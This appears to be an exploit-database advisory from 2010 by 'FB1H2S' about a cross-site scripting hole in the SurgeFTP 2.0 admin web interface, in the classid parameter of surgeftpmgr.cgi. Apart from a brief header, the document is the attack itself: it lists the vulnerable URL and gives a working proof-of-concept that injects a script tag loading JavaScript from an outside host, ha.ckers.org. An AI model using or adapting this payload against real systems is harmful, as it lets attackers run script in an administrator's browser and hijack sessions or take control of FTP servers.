# Exploit Title: Surge-FTP Admin Web interface XSS Vulnerability
# Date: 2010-01-09
# Author: FB1H2S
# Software Link: #http://netwinsite.com/ftp/surgeftp/surgeftp_23a6_windows.exe
# Version: [2.0]
# Tested on: [wINDOWS]
# CVE : [if exists]
# Code : [exploit code] 

<------------------- FB1H2S ------------------- >
#############################################################
#        SURGE FTP ADMIN WEB Module XSS                     #
#############################################################
# Author          : FB1H2S
# Home            : whitec0de.com
# Bug Type        : Xss
#
#  
#############################################################
=======================C=y=b=e=r=_=9=4=5================
http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=[xss via src]



http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=[xss]
 
=======================FB1H2S===========================
*****
Poc *
*****



http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E